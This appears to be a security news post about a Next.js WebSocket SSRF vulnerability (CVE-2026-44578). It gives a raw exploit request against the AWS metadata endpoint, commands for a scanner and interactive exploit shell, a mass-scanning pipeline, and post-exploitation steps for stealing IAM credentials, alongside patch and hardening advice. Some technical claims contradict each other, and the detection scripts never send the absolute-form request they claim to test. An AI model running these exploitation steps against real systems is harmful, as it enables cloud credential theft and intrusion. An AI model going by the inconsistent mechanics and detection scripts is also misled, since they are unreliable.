CVE-2026-44578: The Nextjs WebSocket SSRF That Exposes Cloud Credentials in 3 Steps + Video

Listen to this Post

Featured Image

Introduction:

A critical Server-Side Request Forgery (SSRF) vulnerability has been discovered in Next.js, one of the world’s most popular React frameworks. Tracked as CVE-2026-44578 with a CVSS score of 8.6, this flaw allows unauthenticated attackers to abuse the built‑in Node.js WebSocket upgrade handler, tricking the server into acting as a proxy to arbitrary internal or external destinations. This can lead to the exfiltration of AWS IAM credentials, API keys, and direct access to internal admin panels—all without any user interaction.

Learning Objectives:

  • Understand the root cause of CVE-2026-44578 and how Next.js mishandles WebSocket upgrade requests.
  • Learn how to detect vulnerable instances using automated scanning tools and reconnaissance pipelines.
  • Implement effective mitigation strategies, including patching, network hardening, and configuration fixes.
  • Explore a step‑by‑step exploitation simulation to understand the real‑world impact on cloud environments.
  • Discover post‑exploitation techniques to extract cloud metadata and pivot within internal networks.

You Should Know:

  1. The Anatomy of the Exploit – Absolute‑Form URI & Proxy Fallback

The vulnerability stems from how Next.js processes WebSocket upgrade requests that contain an absolute‑form URI (e.g., GET http://target/path HTTP/1.1). When the server sees the double slash (//), the `normalizeRepeatedSlashes` function returns early with a `308` status code and finished: true. In vulnerable versions, the upgrade handler ignores these flags and simply checks whether `parsedUrl.protocol` exists. If it does, it calls proxyRequest(...). However, because the URL has been mangled (e.g., http://host/path` becomeshttp:/host/path), the `http-proxy` library fails to extract a host, falling back to its default destination: `localhost:80` (orlocalhost:443`). This essentially gives the attacker the ability to force the Next.js server to open a WebSocket connection to its own localhost, but on an attacker‑controlled path.

Step‑by‑Step Guide to Reproduce (For Authorized Testing Only):

  1. Prepare the Malicious Request: Open a raw TCP connection to the target Next.js server and send an HTTP/1.1 WebSocket upgrade request with an absolute URI:
    GET http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1
    Host: vulnerable-nextjs.com
    Connection: Upgrade
    Upgrade: websocket
    Sec-WebSocket-Version: 13
    Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
    
  2. Trigger the Flaw: The server will process the request, ignore the normalization flags, and attempt to proxy it.
  3. Observe the Fallback: Because the host is stripped, the request is sent to the server’s own `localhost:80` with the exact path /latest/meta-data/iam/security-credentials/.
  4. Exfiltrate Credentials: If the server is hosted on AWS and uses IMDSv1, the response will contain the IAM role name and temporary credentials. A second request can retrieve the actual AccessKeyId, SecretKey, and Token.

2. Automated Scanning with the `nextssrf` Tool

Deepak Saini’s post highlights a ready‑to‑use scanner and interactive exploit shell: nextssrf. The tool is written in Python with zero dependencies, making it easy to integrate into reconnaissance pipelines.

Step‑by‑Step Guide to Scan and Exploit:

1. Installation:

git clone https://github.com/ynsmroztas/nextssrf
cd nextssrf

2. Single Target Scan:

python3 nextssrf.py -t https://target.com

3. Cloud‑Specific Targeting:

 AWS metadata only
python3 nextssrf.py -t https://target.com --cloud aws

4. Interactive Shell:

Once a vulnerable target is confirmed, launch the interactive shell to chain multiple requests:

python3 nextssrf.py -t https://target.com --interactive

From the shell, you can enumerate internal services, fetch cloud metadata, and perform further SSRF attacks.

5. Pipeline for Mass Discovery:

Combine subfinder, httpx, and `nextssrf` to automate vulnerability discovery across domains:

subfinder -d target.com | httpx -silent | xargs -I {} python3 nextssrf.py -t {} --cloud aws

Limitations to Keep in Mind:

  • The vulnerability is GET only; you cannot send POST bodies.
  • Only port 80 is reachable (explicit ports are stripped by URL normalization).
  • AWS IMDSv2 is not exploitable because it requires a `PUT` token.
  • GCP metadata endpoints reject `Upgrade: websocket` with a `400` error.
  • Reverse proxies (nginx, Caddy, HAProxy) typically block absolute‑form URIs, offering a degree of protection if placed correctly.

3. Immediate Mitigation and Hardening Steps

The Next.js team has released patched versions 15.5.16 and 16.2.5. Upgrading is the most effective remedy, but if a patch cannot be applied immediately, several workarounds can reduce risk.

Step‑by‑Step Mitigation Guide:

1. Upgrade Next.js:

npm install [email protected]  or [email protected]

2. If Upgrade Is Impossible:

  • Block WebSocket Upgrades at Reverse Proxy Level (nginx example):
    location / {
    if ($http_upgrade = "websocket") {
    return 403;
    }
    proxy_pass http://nextjs_backend;
    }
    
  • Restrict Outbound Traffic: Use iptables or cloud security groups to block the server from reaching metadata endpoints.
    Block access to AWS metadata endpoint
    iptables -A OUTPUT -d 169.254.169.254 -j DROP
    
  • Enforce IMDSv2 on AWS (requires token‑based requests, which this exploit cannot perform).

3. Continuous Monitoring:

  • Analyze WebSocket upgrade traffic for suspicious absolute‑form URIs.
  • Look for internal IP addresses or metadata service patterns in request logs.

4. Post‑Exploitation: Pivoting to Cloud Credentials

Once the SSRF is confirmed, an attacker can chain requests to discover and exfiltrate sensitive cloud credentials. Here’s how the three‑step process from Deepak Saini’s post works:

  1. Cloud Auto‑Detection: The `nextssrf` tool first probes known cloud metadata endpoints (AWS, GCP, Azure, DigitalOcean, etc.) to determine the hosting environment.
  2. IAM Role Discovery: On AWS, it requests `http://169.254.169.254/latest/meta-data/iam/security-credentials/` to retrieve the list of assigned IAM roles.
  3. Credential Extraction: For each role, it fetches the full credentials document, yielding AccessKeyId, SecretAccessKey, Token, and expiration time.

Example of Retrieved Credentials (simulated):

{
"Code" : "Success",
"LastUpdated" : "2026-05-15T12:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "AKIA...",
"SecretAccessKey" : "...",
"Token" : "...",
"Expiration" : "2026-05-15T18:00:00Z"
}

These credentials can then be used with the AWS CLI or boto3 to explore the compromised environment, escalate privileges, or exfiltrate data.

  1. Deploying a Custom Detection Script (Linux / Windows)

To proactively detect vulnerable instances within your infrastructure, you can write a simple Python script that attempts the absolute‑form WebSocket upgrade and checks for the expected error behavior.

Linux / macOS Example:

!/bin/bash
TARGET="https://your-nextjs-app.com"
response=$(curl -s -o /dev/null -w "%{http_code}" -H "Upgrade: websocket" -H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: test" "$TARGET/")
if [ "$response" -eq 308 ]; then
echo "Potential vulnerability detected. Consider patching."
else
echo "Not vulnerable or already patched."
fi

Windows PowerShell Example:

$target = "https://your-nextjs-app.com"
$headers = @{
"Upgrade" = "websocket"
"Sec-WebSocket-Version" = "13"
"Sec-WebSocket-Key" = "test"
}
try {
$response = Invoke-WebRequest -Uri $target -Headers $headers -Method Get -MaximumRedirection 0 -ErrorAction SilentlyContinue
if ($response.StatusCode -eq 308) {
Write-Host "Potential vulnerability detected. Consider patching."
} else {
Write-Host "Not vulnerable or already patched."
}
} catch {
Write-Host "Error: $_"
}

What Undercode Say:

  • This vulnerability is a textbook example of how a seemingly minor mishandling of HTTP normalization—ignoring a `308` intermediate status—can lead to a full SSRF with cloud credential theft.
  • The fact that it requires no authentication and no user interaction makes it extremely dangerous for self‑hosted Next.js applications. Organisations still running vulnerable versions are at immediate risk.
  • While the patch is straightforward, the longer‑term lesson is the critical need for rigorous input validation and proper handling of protocol‑relative URLs in all web frameworks.

Prediction:

As more organisations adopt modern JavaScript frameworks like Next.js, the attack surface around their built‑in servers will continue to attract attention from security researchers and threat actors alike. CVE-2026-44578 will likely be weaponised in automated botnets within weeks, scanning for unprotected self‑hosted instances and exfiltrating cloud credentials at scale. The incident will also accelerate the industry’s shift toward hosted platforms (like Vercel) that can centrally apply security controls, while self‑hosted deployments will see renewed focus on reverse‑proxy protections and outbound traffic restrictions. Expect a wave of SSRF‑related disclosures across other frameworks in the coming months.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Deepak Saini – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky